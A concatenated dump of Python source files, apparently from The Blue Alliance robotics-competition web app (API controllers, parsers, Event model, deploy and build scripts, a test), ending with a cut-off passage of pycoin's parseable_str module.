self.response.headers['Cache-Control'] = "public, max-age=%d" % (5 * 60)
self.response.headers['Pragma'] = 'Public'
self.response.headers.add_header('content-type', 'application/json', charset='utf-8')
output = {}
if not webcast_number.isdigit():
return json.dumps(output)
webcast_number = int(webcast_number) - 1
event = Event.get_by_id(event_key)
if event and event.webcast:
webcast = event.webcast[webcast_number]
if 'type' in webcast and 'channel' in webcast:
output['player'] = self._renderPlayer(webcast)
else:
special_webcasts_future = Sitevar.get_by_id_async('gameday.special_webcasts')
special_webcasts = special_webcasts_future.get_result()
if special_webcasts:
special_webcasts = special_webcasts.contents
else:
special_webcasts = {}
if event_key in special_webcasts:
webcast = special_webcasts[event_key]
if 'type' in webcast and 'channel' in webcast:
output['player'] = self._renderPlayer(webcast)
return json.dumps(output)
def _renderPlayer(self, webcast):
webcast_type = webcast['type']
template_values = {'webcast': webcast}
path = os.path.join(os.path.dirname(__file__), '../templates/webcast/' + webcast_type + '.html')
return template.render(path, template_values)
def memcacheFlush(self, event_key):
keys = [self.CACHE_KEY_FORMAT.format(event_key, n) for n in range(10)]
memcache.delete_multi(keys)
return keys
```
#### File: controllers/api/api_event_controller.py
```python
import json
import logging
import webapp2
from datetime import datetime
from google.appengine.ext import ndb
from controllers.api.api_base_controller import ApiBaseController
from database.event_query import EventListQuery
from helpers.award_helper import AwardHelper
from helpers.district_helper import DistrictHelper
from helpers.model_to_dict import ModelToDict
from models.event import Event
class ApiEventController(ApiBaseController):
CACHE_KEY_FORMAT = "apiv2_event_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60
def __init__(self, *args, **kw):
super(ApiEventController, self).__init__(*args, **kw)
self.event_key = self.request.route_kwargs["event_key"]
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
@property
def _validators(self):
return [("event_id_validator", self.event_key)]
def _set_event(self, event_key):
self.event = Event.get_by_id(event_key)
if self.event is None:
self._errors = json.dumps({"404": "%s event not found" % self.event_key})
self.abort(404)
def _track_call(self, event_key):
self._track_call_defer('event', event_key)
def _render(self, event_key):
self._set_event(event_key)
event_dict = ModelToDict.eventConverter(self.event)
return json.dumps(event_dict, ensure_ascii=True)
class ApiEventTeamsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_teams_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60
def __init__(self, *args, **kw):
super(ApiEventTeamsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/teams', event_key)
def _render(self, event_key):
self._set_event(event_key)
teams = filter(None, self.event.teams)
team_dicts = [ModelToDict.teamConverter(team) for team in teams]
return json.dumps(team_dicts, ensure_ascii=True)
class ApiEventMatchesController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_matches_controller_{}" # (event_key)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventMatchesController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/matches', event_key)
def _render(self, event_key):
self._set_event(event_key)
matches = self.event.matches
match_dicts = [ModelToDict.matchConverter(match) for match in matches]
return json.dumps(match_dicts, ensure_ascii=True)
class ApiEventStatsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_stats_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventStatsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/stats', event_key)
def _render(self, event_key):
self._set_event(event_key)
        return json.dumps(self.event.matchstats)
class ApiEventRankingsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_rankings_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventRankingsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/rankings', event_key)
def _render(self, event_key):
self._set_event(event_key)
        ranks = json.dumps(self.event.rankings)
if ranks is None or ranks == 'null':
return '[]'
else:
return ranks
class ApiEventAwardsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_awards_controller_{}" # (event_key)
CACHE_VERSION = 3
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventAwardsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/awards', event_key)
    def _render(self, event_key):
self._set_event(event_key)
award_dicts = [ModelToDict.awardConverter(award) for award in AwardHelper.organizeAwards(self.event.awards)]
return json.dumps(award_dicts, ensure_ascii=True)
class ApiEventDistrictPointsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_district_points_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventDistrictPointsController, self).__init__(*args, **kw)
        self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/district_points', event_key)
def _render(self, event_key):
self._set_event(event_key)
points = DistrictHelper.calculate_event_points(self.event)
return json.dumps(points, ensure_ascii=True)
class ApiEventListController(ApiBaseController):
CACHE_KEY_FORMAT = "apiv2_event_list_controller_{}" # (year)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60 * 24
def __init__(self, *args, **kw):
super(ApiEventListController, self).__init__(*args, **kw)
self.year = int(self.request.route_kwargs.get("year") or datetime.now().year)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.year)
@property
def _validators(self):
return []
def _track_call(self, *args, **kw):
self._track_call_defer('event/list', self.year)
def _render(self, year=None):
if self.year < 1992 or self.year > datetime.now().year + 1:
self._errors = json.dumps({"404": "No events found for %s" % self.year})
self.abort(404)
events = EventListQuery(self.year).fetch()
event_list = [ModelToDict.eventConverter(event) for event in events]
return json.dumps(event_list, ensure_ascii=True)
```
#### File: parsers/fms_api/fms_api_event_rankings_parser.py
```python
class FMSAPIEventRankingsParser(object):
def parse(self, response):
"""
This currently only works for the 2015 game.
"""
rankings = [['Rank', 'Team', 'Qual Avg', 'Auto', 'Container', 'Coopertition', 'Litter', 'Tote', 'Played']]
for team in response['Rankings']:
rankings.append([
team['rank'],
team['teamNumber'],
team['qualAverage'],
team['autoPoints'],
team['containerPoints'],
team['coopertitionPoints'],
team['litterPoints'],
team['totePoints'],
team['matchesPlayed']])
return rankings if len(rankings) > 1 else None
```
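A worked example of the parser with a hand-built response; the field names are taken directly from the parser above:

```python
response = {'Rankings': [
    {'rank': 1, 'teamNumber': 254, 'qualAverage': 112.0, 'autoPoints': 40,
     'containerPoints': 36, 'coopertitionPoints': 20, 'litterPoints': 6,
     'totePoints': 10, 'matchesPlayed': 10},
]}
rows = FMSAPIEventRankingsParser().parse(response)
# rows[0] is the header row; rows[1] == [1, 254, 112.0, 40, 36, 20, 6, 10, 10]
```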
#### File: parsers/fms_api/fms_api_team_details_parser.py
```python
import datetime
import json
import logging
from google.appengine.ext import ndb
from consts.district_type import DistrictType
from models.district_team import DistrictTeam
from models.team import Team
from models.robot import Robot
class FMSAPITeamDetailsParser(object):
def __init__(self, year, team_key):
self.year = year
self.team_key = team_key
def parse(self, response):
"""
Parse team info from FMSAPI
Returns a tuple of models (Team, DistrictTeam, Robot)
"""
        # Get team json
        # no need to null check; if there's an error the HTTP code != 200, so we won't get here
teams = response['teams']
teamData = teams[0]
# concat city/state/country to get address
address = u"{}, {}, {}".format(teamData['city'], teamData['stateProv'], teamData['country'])
team = Team(
team_number=teamData['teamNumber'],
name=teamData['nameFull'],
nickname=teamData['nameShort'],
address=address,
rookie_year=teamData['rookieYear']
)
districtTeam = None
if teamData['districtCode']:
districtAbbrev = DistrictType.abbrevs[teamData['districtCode'].lower()]
districtTeam = DistrictTeam(
id=DistrictTeam.renderKeyName(self.year, districtAbbrev, team.key_name),
team=ndb.Key(Team, team.key_name),
year=self.year,
district=districtAbbrev
)
robot = None
if teamData['robotName']:
robot = Robot(
id=Robot.renderKeyName(team.key_name, self.year),
team=ndb.Key(Team, team.key_name),
year=self.year,
robot_name=teamData['robotName'].strip()
)
return (team, districtTeam, robot)
```
#### File: josephbisch/the-blue-alliance/deploy.py
```python
import os
import sys
def main(argv):
skip_tests = '-s' in argv
os.chdir('../the-blue-alliance-prod')
os.system('git stash') # undoes the application ID change to app.yaml
os.system('git pull origin master')
os.system('git stash pop') # restores the application ID change to app.yaml
test_status = 0
if skip_tests:
print "Skipping tests!"
os.system('paver make')
else:
test_status = os.system('paver preflight')
os.chdir('../')
if test_status == 0:
os.system('python ~/Downloads/google_appengine/appcfg.py --oauth2 update the-blue-alliance-prod/')
else:
print "Tests failed! Did not deploy."
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: helpers/firebase/firebase_pusher.py
```python
import datetime
import json
import logging
import tba_config
import time
from google.appengine.ext import deferred
from google.appengine.api import urlfetch
from models.sitevar import Sitevar
class FirebasePusher(object):
@classmethod
def _get_secret(cls):
firebase_secrets = Sitevar.get_by_id("firebase.secrets")
if firebase_secrets is None:
raise Exception("Missing sitevar: firebase.secrets. Can't write to Firebase.")
return firebase_secrets.contents['FIREBASE_SECRET']
@classmethod
def _delete_data(cls, key):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, method='DELETE')
if result.status_code != 204:
logging.warning("Error deleting data from Firebase: {}. ERROR {}: {}".format(url, result.status_code, result.content))
@classmethod
def _put_data(cls, key, data_json):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, payload=data_json, method='PUT')
if result.status_code != 200:
logging.warning("Error pushing data to Firebase: {}; {}. ERROR {}: {}".format(url, data_json, result.status_code, result.content))
@classmethod
def _push_data(cls, key, data_json):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, payload=data_json, method='POST')
if result.status_code != 200:
logging.warning("Error pushing data to Firebase: {}; {}. ERROR {}: {}".format(url, data_json, result.status_code, result.content))
@classmethod
def match_to_payload_dict(cls, match):
return {'key_name': match.key_name,
'comp_level': match.comp_level,
'match_number': match.match_number,
'set_number': match.set_number,
'alliances': match.alliances,
'winning_alliance': match.winning_alliance,
'order': match.play_order}
@classmethod
def delete_match(cls, match):
payload_key = 'events/{}/matches/{}'.format(match.event.id(), match.key_name)
deferred.defer(cls._delete_data, payload_key, _queue="firebase")
@classmethod
def update_match(cls, match):
payload_key = 'events/{}/matches/{}'.format(match.event.id(), match.key_name)
payload_data_json = json.dumps(cls.match_to_payload_dict(match))
deferred.defer(cls._put_data, payload_key, payload_data_json, _queue="firebase")
@classmethod
def push_notification(cls, notification):
payload_data_json = json.dumps({
'time': datetime.datetime.now().isoformat(),
'payload': notification._render_webhook()
})
deferred.defer(cls._push_data, 'notifications', payload_data_json, _queue="firebase")
```
#### File: the-blue-alliance/helpers/media_helper.py
```python
import json
import logging
import re
from google.appengine.api import urlfetch
from BeautifulSoup import BeautifulSoup
from consts.media_type import MediaType
class MediaHelper(object):
@classmethod
def group_by_slugname(cls, medias):
medias_by_slugname = {}
for media in medias:
slugname = media.slug_name
if slugname in medias_by_slugname:
medias_by_slugname[slugname].append(media)
else:
medias_by_slugname[slugname] = [media]
return medias_by_slugname
class MediaParser(object):
CD_PHOTO_THREAD_URL_PATTERNS = ['chiefdelphi.com/media/photos/']
YOUTUBE_URL_PATTERNS = ['youtube.com', 'youtu.be']
@classmethod
def partial_media_dict_from_url(cls, url):
"""
Takes a url, and turns it into a partial Media object dict
"""
if any(s in url for s in cls.CD_PHOTO_THREAD_URL_PATTERNS):
return cls._partial_media_dict_from_cd_photo_thread(url)
elif any(s in url for s in cls.YOUTUBE_URL_PATTERNS):
return cls._partial_media_dict_from_youtube(url)
else:
logging.warning("Failed to determine media type from url: {}".format(url))
return None
@classmethod
def _partial_media_dict_from_cd_photo_thread(cls, url):
media_dict = {}
media_dict['media_type_enum'] = MediaType.CD_PHOTO_THREAD
foreign_key = cls._parse_cdphotothread_foreign_key(url)
if foreign_key is None:
logging.warning("Failed to determine foreign_key from url: {}".format(url))
return None
media_dict['foreign_key'] = foreign_key
urlfetch_result = urlfetch.fetch(url, deadline=10)
if urlfetch_result.status_code != 200:
logging.warning('Unable to retrieve url: {}'.format(url))
return None
image_partial = cls._parse_cdphotothread_image_partial(urlfetch_result.content)
if image_partial is None:
logging.warning("Failed to determine image_partial from the page: {}".format(url))
return None
media_dict['details_json'] = json.dumps({'image_partial': image_partial})
return media_dict
@classmethod
def _partial_media_dict_from_youtube(cls, url):
media_dict = {}
media_dict['media_type_enum'] = MediaType.YOUTUBE
foreign_key = cls._parse_youtube_foreign_key(url)
if foreign_key is None:
logging.warning("Failed to determine foreign_key from url: {}".format(url))
return None
media_dict['foreign_key'] = foreign_key
return media_dict
@classmethod
def _parse_cdphotothread_foreign_key(cls, url):
        regex1 = re.match(r'.*chiefdelphi\.com/media/photos/(\d+)', url)
if regex1 is not None:
return regex1.group(1)
else:
return None
@classmethod
def _parse_cdphotothread_image_partial(cls, html):
"""
Input: the HTML from the thread page
ex: http://www.chiefdelphi.com/media/photos/38464,
returns the url of the image in the thread
ex: http://www.chiefdelphi.com/media/img/3f5/3f5db241521ae5f2636ff8460f277997_l.jpg
"""
html = html.decode("utf-8", "replace")
# parse html for the image url
soup = BeautifulSoup(html,
convertEntities=BeautifulSoup.HTML_ENTITIES)
# 2014-07-15: CD doesn't properly escape the photo title, which breaks the find() for cdmLargePic element below
# Fix by removing all instances of the photo title from the HTML
photo_title = soup.find('div', {'id': 'cdm_single_photo_title'}).text
cleaned_soup = BeautifulSoup(html.replace(photo_title, ''),
convertEntities=BeautifulSoup.HTML_ENTITIES)
element = cleaned_soup.find('a', {'target': 'cdmLargePic'})
if element is not None:
partial_url = element['href']
else:
return None
# partial_url looks something like: "/media/img/774/774d98c80dcf656f2431b2e9186f161a_l.jpg"
# we want "774/774d98c80dcf656f2431b2e9186f161a_l.jpg"
image_partial = re.match(r'\/media\/img\/(.*)', partial_url)
if image_partial is not None:
return image_partial.group(1)
else:
return None
@classmethod
def _parse_youtube_foreign_key(cls, url):
youtube_id = None
regex1 = re.match(r".*youtu\.be\/(.*)", url)
if regex1 is not None:
youtube_id = regex1.group(1)
else:
regex2 = re.match(r".*v=([a-zA-Z0-9_-]*)", url)
if regex2 is not None:
youtube_id = regex2.group(1)
if youtube_id is None:
return None
else:
return youtube_id
```
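The two YouTube regexes cover short `youtu.be` links and long `watch?v=` URLs. A quick check of `_parse_youtube_foreign_key` on both forms (the video ID is illustrative):

```python
urls = [
    "http://youtu.be/dQw4w9WgXcQ",
    "http://www.youtube.com/watch?v=dQw4w9WgXcQ&feature=share",
]
for url in urls:
    print(MediaParser._parse_youtube_foreign_key(url))  # dQw4w9WgXcQ, twice
```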
#### File: the-blue-alliance/helpers/team_manipulator.py
```python
from helpers.cache_clearer import CacheClearer
from helpers.manipulator_base import ManipulatorBase
class TeamManipulator(ManipulatorBase):
"""
Handle Team database writes.
"""
@classmethod
def getCacheKeysAndControllers(cls, affected_refs):
return CacheClearer.get_team_cache_keys_and_controllers(affected_refs)
@classmethod
    def updateMerge(cls, new_team, old_team, auto_union=True):
"""
Given an "old" and a "new" Team object, replace the fields in the
"old" team that are present in the "new" team, but keep fields from
the "old" team that are null in the "new" team.
"""
attrs = [
"address",
"name",
"nickname",
"website",
"rookie_year",
]
for attr in attrs:
if getattr(new_team, attr) is not None:
if getattr(new_team, attr) != getattr(old_team, attr):
setattr(old_team, attr, getattr(new_team, attr))
old_team.dirty = True
# Take the new tpid and tpid_year iff the year is newer than the old one
if (new_team.first_tpid_year > old_team.first_tpid_year):
old_team.first_tpid_year = new_team.first_tpid_year
old_team.first_tpid = new_team.first_tpid
old_team.dirty = True
return old_team
```
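A toy illustration of the merge rule with stand-in objects rather than the real ndb `Team` model; the attribute names mirror the `attrs` list above:

```python
class FakeTeam(object):
    def __init__(self, **kw):
        for attr in ('address', 'name', 'nickname', 'website', 'rookie_year',
                     'first_tpid', 'first_tpid_year'):
            setattr(self, attr, kw.get(attr))
        self.dirty = False

old = FakeTeam(name='Old Name', website='http://example.com', first_tpid_year=2013)
new = FakeTeam(name='New Name', first_tpid=42, first_tpid_year=2014)
merged = TeamManipulator.updateMerge(new, old)
# merged.name == 'New Name' (the new value wins), merged.website is kept from
# old, and the tpid fields were taken because 2014 > 2013.
```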
#### File: the-blue-alliance/models/event.py
```python
from google.appengine.ext import ndb
import datetime
import json
import pytz
import re
from consts.district_type import DistrictType
from consts.event_type import EventType
class Event(ndb.Model):
"""
Events represent FIRST Robotics Competition events, both official and unofficial.
key_name is like '2010ct'
"""
name = ndb.StringProperty()
event_type_enum = ndb.IntegerProperty(required=True)
short_name = ndb.StringProperty(indexed=False) # Should not contain "Regional" or "Division", like "Hartford"
event_short = ndb.StringProperty(required=True, indexed=False) # Smaller abbreviation like "CT"
year = ndb.IntegerProperty(required=True)
event_district_enum = ndb.IntegerProperty()
start_date = ndb.DateTimeProperty()
end_date = ndb.DateTimeProperty()
venue = ndb.StringProperty(indexed=False)
venue_address = ndb.StringProperty(indexed=False) # We can scrape this.
location = ndb.StringProperty(indexed=False) # in the format "locality, region, country". similar to Team.address
timezone_id = ndb.StringProperty() # such as 'America/Los_Angeles' or 'Asia/Jerusalem'
official = ndb.BooleanProperty(default=False) # Is the event FIRST-official?
first_eid = ndb.StringProperty() # from USFIRST
facebook_eid = ndb.StringProperty(indexed=False) # from Facebook
custom_hashtag = ndb.StringProperty(indexed=False) #Custom HashTag
website = ndb.StringProperty(indexed=False)
webcast_json = ndb.TextProperty(indexed=False) # list of dicts, valid keys include 'type' and 'channel'
matchstats_json = ndb.TextProperty(indexed=False) # for OPR, DPR, CCWM, etc.
rankings_json = ndb.TextProperty(indexed=False)
alliance_selections_json = ndb.TextProperty(indexed=False) # Formatted as: [{'picks': [captain, pick1, pick2, 'frc123', ...], 'declines':[decline1, decline2, ...] }, {'picks': [], 'declines': []}, ... ]
district_points_json = ndb.TextProperty(indexed=False)
created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
def __init__(self, *args, **kw):
# store set of affected references referenced keys for cache clearing
# keys must be model properties
self._affected_references = {
'key': set(),
'year': set(),
'event_district_abbrev': set(),
'event_district_key': set()
}
self._alliance_selections = None
self._awards = None
self._district_points = None
self._matches = None
self._matchstats = None
self._rankings = None
self._teams = None
self._webcast = None
self._updated_attrs = [] # Used in EventManipulator to track what changed
super(Event, self).__init__(*args, **kw)
@ndb.tasklet
def get_awards_async(self):
from database import award_query
self._awards = yield award_query.EventAwardsQuery(self.key_name).fetch_async()
@property
def alliance_selections(self):
"""
Lazy load alliance_selections JSON
"""
if self._alliance_selections is None:
try:
self._alliance_selections = json.loads(self.alliance_selections_json)
except Exception, e:
self._alliance_selections = None
return self._alliance_selections
@property
def alliance_teams(self):
"""
Load a list of team keys playing in elims
"""
alliances = self.alliance_selections
if alliances is None:
return []
teams = []
for alliance in alliances:
for pick in alliance['picks']:
teams.append(pick)
return teams
@property
def awards(self):
# This import is ugly, and maybe all the models should be in one file again -gregmarra 20121006
from models.award import Award
if self._awards is None:
self.get_awards_async().wait()
return self._awards
@property
def district_points(self):
"""
Lazy load district_points JSON
"""
if self._district_points is None:
try:
self._district_points = json.loads(self.district_points_json)
except Exception, e:
self._district_points = None
return self._district_points
@ndb.tasklet
def get_matches_async(self):
from database import match_query
self._matches = yield match_query.EventMatchesQuery(self.key_name).fetch_async()
@property
def matches(self):
# This import is ugly, and maybe all the models should be in one file again -gregmarra 20121006
from models.match import Match
        if self._matches is None:
            self.get_matches_async().wait()
return self._matches
def withinDays(self, negative_days_before, days_after):
if not self.start_date or not self.end_date:
return False
now = datetime.datetime.now()
if self.timezone_id is not None:
tz = pytz.timezone(self.timezone_id)
try:
now = now + tz.utcoffset(now)
except pytz.NonExistentTimeError: # may happen during DST
                now = now + tz.utcoffset(now + datetime.timedelta(hours=1))  # add offset to get out of non-existent time
after_start = self.start_date.date() + datetime.timedelta(days=negative_days_before) <= now.date()
before_end = self.end_date.date() + datetime.timedelta(days=days_after) >= now.date()
return (after_start and before_end)
@property
def now(self):
if self.timezone_id is not None:
return self.withinDays(0, 0)
else:
return self.within_a_day # overestimate what is "now" if no timezone
@property
def within_a_day(self):
return self.withinDays(-1, 1)
@property
def past(self):
return self.end_date.date() < datetime.date.today() and not self.within_a_day
@property
def future(self):
return self.start_date.date() > datetime.date.today() and not self.within_a_day
@ndb.tasklet
def get_teams_async(self):
from database import team_query
self._teams = yield team_query.EventTeamsQuery(self.key_name).fetch_async()
@property
def teams(self):
if self._teams is None:
self.get_teams_async().wait()
return self._teams
@ndb.toplevel
def prepAwardsMatchesTeams(self):
yield self.get_awards_async(), self.get_matches_async(), self.get_teams_async()
@ndb.toplevel
def prepTeams(self):
yield self.get_teams_async()
@ndb.toplevel
def prepTeamsMatches(self):
yield self.get_matches_async(), self.get_teams_async()
@property
def matchstats(self):
"""
Lazy load parsing matchstats JSON
"""
if self._matchstats is None:
try:
self._matchstats = json.loads(self.matchstats_json)
except Exception, e:
self._matchstats = None
return self._matchstats
@property
def rankings(self):
"""
Lazy load parsing rankings JSON
"""
if self._rankings is None:
try:
self._rankings = json.loads(self.rankings_json)
except Exception, e:
self._rankings = None
return self._rankings
@property
def venue_or_venue_from_address(self):
if self.venue:
return self.venue
else:
try:
return self.venue_address.split('\r\n')[0]
except:
return None
@property
def webcast(self):
"""
Lazy load parsing webcast JSON
"""
if self._webcast is None:
try:
self._webcast = json.loads(self.webcast_json)
except Exception, e:
self._webcast = None
return self._webcast
@property
def key_name(self):
"""
Returns the string of the key_name of the Event object before writing it.
"""
return str(self.year) + self.event_short
@property
def facebook_event_url(self):
"""
Return a string of the Facebook Event URL.
"""
return "http://www.facebook.com/event.php?eid=%s" % self.facebook_eid
@property
def details_url(self):
"""
Returns the URL pattern for the link to this Event on TBA
"""
return "/event/%s" % self.key_name
@property
def gameday_url(self):
"""
Returns the URL pattern for the link to watch webcasts in Gameday
"""
if self.webcast:
gameday_link = '/gameday'
view_num = 0
for webcast in self.webcast:
if view_num == 0:
gameday_link += '#'
else:
gameday_link += '&'
if 'type' in webcast and 'channel' in webcast:
gameday_link += 'view_' + str(view_num) + '=' + self.key_name + '-' + str(view_num + 1)
view_num += 1
return gameday_link
else:
return None
@property
def hashtag(self):
"""
Return the hashtag used for the event.
"""
if self.custom_hashtag:
return self.custom_hashtag
else:
return "frc" + self.event_short
    # Deprecated, still here to keep GAE clean.
webcast_url = ndb.StringProperty(indexed=False)
@classmethod
    def validate_key_name(cls, event_key):
key_name_regex = re.compile(r'^[<KEY>')
match = re.match(key_name_regex, event_key)
return True if match else False
@property
def event_district_str(self):
return DistrictType.type_names.get(self.event_district_enum, None)
@property
def event_district_abbrev(self):
return DistrictType.type_abbrevs.get(self.event_district_enum, None)
@property
def event_district_key(self):
district_abbrev = DistrictType.type_abbrevs.get(self.event_district_enum, None)
if district_abbrev is None:
return None
else:
return '{}{}'.format(self.year, district_abbrev)
@property
def event_type_str(self):
return EventType.type_names[self.event_type_enum]
```
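Nearly every `*_json` field on this model follows the same lazy, memoized parse idiom. A distilled sketch of the pattern:

```python
import json

class LazyJson(object):
    def __init__(self, rankings_json=None):
        self.rankings_json = rankings_json
        self._rankings = None

    @property
    def rankings(self):
        # Parse once and cache; fall back to None on missing or invalid JSON.
        if self._rankings is None:
            try:
                self._rankings = json.loads(self.rankings_json)
            except (TypeError, ValueError):
                self._rankings = None
        return self._rankings

print(LazyJson('[{"rank": 1}]').rankings)  # [{'rank': 1}]
```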
#### File: josephbisch/the-blue-alliance/pavement.py
```python
import subprocess
import json
import time
from paver.easy import *
path = path("./")
@task
def deploy():
sh("python deploy.py")
@task
def javascript():
"""Combine Compress Javascript"""
print("Combining and Compressing Javascript")
sh("python do_compress.py js")
@task
def less():
"""Build and Combine CSS"""
print("Building and Combining CSS")
sh("lessc static/css/less_css/tba_style.main.less static/css/less_css/tba_style.main.css")
sh("lessc static/css/less_css/tba_style.gameday.less static/css/less_css/tba_style.gameday.css")
sh("python do_compress.py css")
@task
def lint():
sh("python linter.py")
@task
def make():
javascript()
less()
git_branch_name = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"])
git_last_commit = subprocess.check_output(["git", "log", "-1"])
build_time = time.ctime()
data = {'git_branch_name': git_branch_name,
'git_last_commit': git_last_commit,
'build_time': build_time}
with open('version_info.json', 'w') as f:
f.write(json.dumps(data))
@task
def preflight():
"""Prep a prod push"""
test_function([])
make()
@task
def setup():
"""Set up for development environments."""
setup_function()
@task
@consume_args
def test(args):
"""Run tests. Accepts an argument to match subnames of tests"""
test_function(args)
@task
def test_fast():
"""Run tests that don't require HTTP"""
print("Running Fast Tests")
sh("python run_tests.py --test_pattern=test_math_*.py")
sh("python run_tests.py --test_pattern=test_*parser*.py")
sh("python run_tests.py --test_pattern=test_*manipulator.py")
sh("python run_tests.py --test_pattern=test_*api.py")
sh("python run_tests.py --test_pattern=test_event.py")
sh("python run_tests.py --test_pattern=test_match_cleanup.py")
sh("python run_tests.py --test_pattern=test_event_group_by_week.py")
sh("python run_tests.py --test_pattern=test_event_team_repairer.py")
sh("python run_tests.py --test_pattern=test_event_team_updater.py")
sh("python run_tests.py --test_pattern=test_event_get_short_name.py")
def setup_function():
make()
def test_function(args):
print("Running Tests")
test_pattern = ""
if len(args) > 0:
test_pattern = " --test_pattern=*%s*" % args[0]
sh("python run_tests.py%s 2> test_failures.temp" % test_pattern)
```
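The `test` task above forwards its first argument into a glob for `run_tests.py`. A quick illustration of the command string `test_function` builds (plain string logic, no paver required; the argument is hypothetical):
```python
# What `paver test event` ends up shelling out to, per test_function above:
args = ["event"]
test_pattern = " --test_pattern=*%s*" % args[0] if len(args) > 0 else ""
print("python run_tests.py%s 2> test_failures.temp" % test_pattern)
# -> python run_tests.py --test_pattern=*event* 2> test_failures.temp
```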
#### File: the-blue-alliance/tests/test_datafeed_usfirst_matches.py
```python
import unittest2
import datetime
from google.appengine.ext import db
from google.appengine.ext import testbed
from datafeeds.datafeed_usfirst import DatafeedUsfirst
from models.event import Event
class TestDatafeedUsfirstMatches(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
self.datafeed = DatafeedUsfirst()
def tearDown(self):
self.testbed.deactivate()
def test_getMatchResultsList(self):
event = Event(
id="2011ct",
event_short="ct",
year=2011
)
matches = self.datafeed.getMatches(event)
# Test 2011ct_qm1
match = matches[0]
self.assertEqual(match.comp_level, "qm")
self.assertEqual(match.set_number, 1)
self.assertEqual(match.match_number, 1)
self.assertEqual(match.team_key_names, [u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 57, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": 74, "teams": ["frc69", "frc571", "frc176"]}}""")
self.assertEqual(match.time_string, "9:29 AM")
# Test 2011ct_qf2m3
match = matches[-7]
self.assertEqual(match.comp_level, "qf")
self.assertEqual(match.set_number, 2)
self.assertEqual(match.match_number, 3)
self.assertEqual(match.team_key_names, [u'frc716', u'frc3125', u'frc181', u'frc1699', u'frc1124', u'frc714'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 74, "teams": ["frc1699", "frc1124", "frc714"]}, "red": {"score": 90, "teams": ["frc716", "frc3125", "frc181"]}}""")
self.assertEqual(match.time_string, "2:05 PM")
# Test 2011ct_f1m2
match = matches[-1]
self.assertEqual(match.comp_level, "f")
self.assertEqual(match.set_number, 1)
self.assertEqual(match.match_number, 2)
self.assertEqual(match.team_key_names, [u'frc195', u'frc1923', u'frc155', u'frc177', u'frc175', u'frc1073'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 65, "teams": ["frc177", "frc175", "frc1073"]}, "red": {"score": 97, "teams": ["frc195", "frc1923", "frc155"]}}""")
self.assertEqual(match.time_string, "3:23 PM")
``` |
{
"source": "JosephBless/pycoin",
"score": 3
} |
#### File: pycoin/networks/parseable_str.py
```python
from pycoin.encoding.b58 import a2b_base58
from pycoin.encoding.hash import double_sha256
from pycoin.contrib import bech32m
from pycoin.intbytes import int2byte
class parseable_str(str):
"""
This is a subclass of str which allows caching of parsed base58 and bech32
data (or really anything) to eliminate the need to repeatedly run slow parsing
code when checking validity for multiple types.
"""
    def __new__(cls, s):
        if isinstance(s, parseable_str):
            return s
        return str.__new__(cls, s)
    def __init__(self, s):
        super(parseable_str, self).__init__()
if isinstance(s, parseable_str):
self._cache = s._cache
else:
self._cache = {}
def cache(self, key, f):
if key not in self._cache:
self._cache[key] = None
try:
self._cache[key] = f(self)
except Exception:
pass
return self._cache[key]
def parse_b58(s):
s = parseable_str(s)
return s.cache("b58", a2b_base58)
def b58_double_sha256(s):
data = parse_b58(s)
if data:
data, the_hash = data[:-4], data[-4:]
if double_sha256(data)[:4] == the_hash:
return data
def parse_b58_double_sha256(s):
s = parseable_str(s)
return s.cache("b58_double_sha256", b58_double_sha256)
def parse_bech32_or_32m(s):
triple = bech32m.bech32_decode(s)
if triple is None or triple[1] is None:
return None
hr_prefix = triple[0]
